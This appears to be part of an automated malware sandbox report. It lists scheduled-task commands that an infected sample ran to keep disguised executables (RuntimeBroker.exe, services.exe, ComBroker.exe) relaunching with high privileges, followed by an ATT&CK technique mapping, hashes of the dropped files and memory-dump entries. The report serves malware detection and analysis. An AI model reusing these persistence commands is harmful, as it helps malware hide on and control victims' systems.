schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\Cursors\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComBrokerC" /sc MINUTE /mo 10 /tr "'C:\PortFontnetCommon\ComBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComBroker" /sc ONLOGON /tr "'C:\PortFontnetCommon\ComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComBrokerC" /sc MINUTE /mo 11 /tr "'C:\PortFontnetCommon\ComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PortFontnetCommon\ComBroker.exe

Filesize
2.0MB

MD5
2af56288ae70824c48341954c6817df4

SHA1
36a4df878adc348e12ab01d8cee1b730f234158f

SHA256
08cd9bdbfd747ca0b60186b1c6d8a27c892cb6e3ee1e7e857302b881e8a6d125

SHA512
9469cec69704dccad5c6648af3722c98b2aa3e63ff549b4dd821470c6624e6aee1ddecfc4f4e0feb5f967c8110439b347717f98fc09f8664cef4e4f179199dcb

Download Submit
C:\PortFontnetCommon\IOEmPpqly1DOIlscl2iPO8G0g.bat

Filesize
77B

MD5
8a8897cb275aec7987c9fea337dbb5d7

SHA1
cacad156f59892d6070327926560ab0a5fc737da

SHA256
41ec477f48bcce425a660de22536aa3b0fde43560f13158e91d00732185d46a6

SHA512
0c2e8d66062b525a766545f82cf96808b40b307c2b8e478afd2fc1bb5ea8535a83b0b00bafb10af467bd937513d8713e6672b21955551beb33e62d45984092cc

Download Submit
C:\PortFontnetCommon\jnh1y.vbe

Filesize
220B

MD5
8bd8bfc27a2ccc45fc9bb7c3908de480

SHA1
40190bcef75e208709fabdac52efdfea410a6fa9

SHA256
0b6cb03c8b7f3adc721771d9b0f2453f7c983851d3621a6a620b8dbd76f9ba43

SHA512
2ce7ce7525bde10656c8539d1fb1fcbe3d8db693e05efaf6d24017766d623abd2414e7469df9b2d43aef3e4f24584628b7f0060efa51bbb42b0e9e270e76449a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45ad40f012b09e141955482368549640

SHA1
3f9cd15875c1e397c3b2b5592805577ae88a96cb

SHA256
ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

SHA512
3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FATALITY.exe

Filesize
2.5MB

MD5
835f86f98a133e8bebd227594e9aff76

SHA1
3ebb6890c3f47ab0c906d958895a0d7db2de13d3

SHA256
73354fe6381e7678e3ee478c2c1e8bb21917c8de19e7218e5c4d241345831b29

SHA512
89f5a6a28794b4e414a9f95c44cdaf8e1b3998f668214de30716abd75dc32e526fe001aa5294bae5a44ae5e6274493191f3c2da8ba92fac1ab9f421cedecccc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E63.tmp

Filesize
1KB

MD5
33fa58e1bff1e52125145c873129a00c

SHA1
29ba14c8dabecb210674b79302ae276a709b7a0c

SHA256
01b8b572ebcb6c2ac9dd738feb26d2a779d0d01168f7086583315dcd49290643

SHA512
dd86580f43faf742206583d4a4531cddfdcaf07b5e686be27b54e3aba9cfbfc07cd2807a17d92d99c97f3310b74ec9e7293c2322cd0cbdf4893dc1d81987e638

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
227KB

MD5
e7452f59f2853220a6db8b98e26a81d1

SHA1
730e6e1f5a6ee671b4be097843b08c242ef4e8fb

SHA256
a9f45987c45143e6c198ebb530c0df131cf1ce8d6b40f07128d22ed30a698f21

SHA512
22ac9f0951e0a7f32012b20335b464eb0b41609f5fbf8bc7ecacfbc3dcad73bfdaeac5695632b9f8005edd2066b2b79a01a743ce04f5847c76e4faff7b1291b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe

Filesize
490KB

MD5
fa3f84d3150dab7b7d8e35efbb8d02db

SHA1
5b690c0be18426633a1954844f49cee2b1e09cb7

SHA256
a42d5a457ee0d90dee5cb5ba969687a83ba5626abf040a2f3ed496f83456c162

SHA512
a4dd554461e167c6a272f8ca90bcde729c319a115419b2a8874af34241116afadf9e6a4dec7db5e145f7e5a1d98827f0a50861c862abb89de81c3f4703247f1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Y8vXIQimrI.bat

Filesize
212B

MD5
c8a28f84ef4a46c9fa28dfd4221f468d

SHA1
3186d1c65c603c3cadcb8c90c864cc41b18d0e6a

SHA256
185d54da37bc5097e15ff8e913b077f7ec6077ca50d1b3916338932a5b2b6596

SHA512
5b688f15207ab045494cfcf0e7a6882bc5237cc455960cccd9036c556c7d696c52ae0800eb069116298ef48c42c78af499ccd8d819b7866b089eb6c5b08fb5eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5isccgr.pxl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iau0ymgv\iau0ymgv.0.cs

Filesize
368B

MD5
d7a2e2b85541688a0f68aac26b9479ba

SHA1
389837bc41d2be0a9e94fdf1e25708e1c582de7b

SHA256
afce65bea9cd1059f6b56b07e4047b462b9f6752c343e046a2891f8822b2cddb

SHA512
63ec01a5a6ba87752c8fbc4351bc3990ea5c685c292f9948a818e6aebd516095b5d2052596b922cdd58e506e3b77ea2cafaf9ba5e670b746dc67a809b735b9cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iau0ymgv\iau0ymgv.cmdline

Filesize
235B

MD5
705cbbd6738d849f8b1bc4cd166f9918

SHA1
b35a69ea5675f22d7fcb00d8d46ad364e64963de

SHA256
6d8346d2ed01923162e8b0934a900b0e9758e6c47058fdcc41149d2456dd556d

SHA512
58401af2d2f3a007fc7fab29b7215a7043d40dadf6d4d3ac75f0acfa6e0657f677df14103829912771a800b31718bd7932dbccea88ea5b065e689b3c0f55c7d2

Download Submit
\??\c:\Windows\System32\CSC4D61D42B296D42519CD99675647E202F.TMP

Filesize
1KB

MD5
8dd28efa24161c95f66186f87013c172

SHA1
d39e29dec785bb67109ce4a6acaaac1613b96298

SHA256
8c39b597991e208b03dc19495c65b9a795ac982ac0aea89984cecab1cff0992c

SHA512
4b6f33df64e0fc0eb4a4cbe9f7d3ddaf826ab614c753c2edaa26d7037d0ff394b4adeb1f2437017ef1fc100415d8e42f5cd2167ceffc4626c7c4f6cecef696c4

Download Submit
memory/2388-53-0x00000240B1590000-0x00000240B15B2000-memory.dmp

Filesize
136KB

Download
memory/3192-143-0x0000000002D90000-0x0000000002D9E000-memory.dmp

Filesize
56KB

Download
memory/3192-149-0x000000001BD30000-0x000000001BD3E000-memory.dmp

Filesize
56KB

Download
memory/3192-151-0x000000001BD40000-0x000000001BD4C000-memory.dmp

Filesize
48KB

Download
memory/3192-147-0x000000001B8D0000-0x000000001B8DE000-memory.dmp

Filesize
56KB

Download
memory/3192-145-0x000000001B8C0000-0x000000001B8CC000-memory.dmp

Filesize
48KB

Download
memory/3192-141-0x000000001BD10000-0x000000001BD28000-memory.dmp

Filesize
96KB

Download
memory/3192-132-0x0000000000AA0000-0x0000000000CA0000-memory.dmp

Filesize
2.0MB

Download
memory/3192-137-0x0000000002D80000-0x0000000002D8E000-memory.dmp

Filesize
56KB

Download
memory/3192-139-0x000000001B8E0000-0x000000001B8FC000-memory.dmp

Filesize
112KB

Download
memory/3672-37-0x0000000005820000-0x00000000058B2000-memory.dmp

Filesize
584KB

Download
memory/3672-35-0x000000007363E000-0x000000007363F000-memory.dmp

Filesize
4KB

Download
memory/3672-36-0x0000000000F80000-0x0000000001000000-memory.dmp

Filesize
512KB

Download
memory/3672-38-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4104-74-0x000002963DA00000-0x000002963DA76000-memory.dmp

Filesize
472KB

Download
memory/4104-31-0x00007FFD00333000-0x00007FFD00335000-memory.dmp

Filesize
8KB

Download
memory/4104-75-0x000002963DA80000-0x000002963DAD0000-memory.dmp

Filesize
320KB

Download
memory/4104-112-0x000002963D980000-0x000002963D98A000-memory.dmp

Filesize
40KB

Download
memory/4104-76-0x000002963D9D0000-0x000002963D9EE000-memory.dmp

Filesize
120KB

Download
memory/4104-29-0x00000296232A0000-0x00000296232E0000-memory.dmp

Filesize
256KB

Download
memory/4104-113-0x000002963D9B0000-0x000002963D9C2000-memory.dmp

Filesize
72KB

Download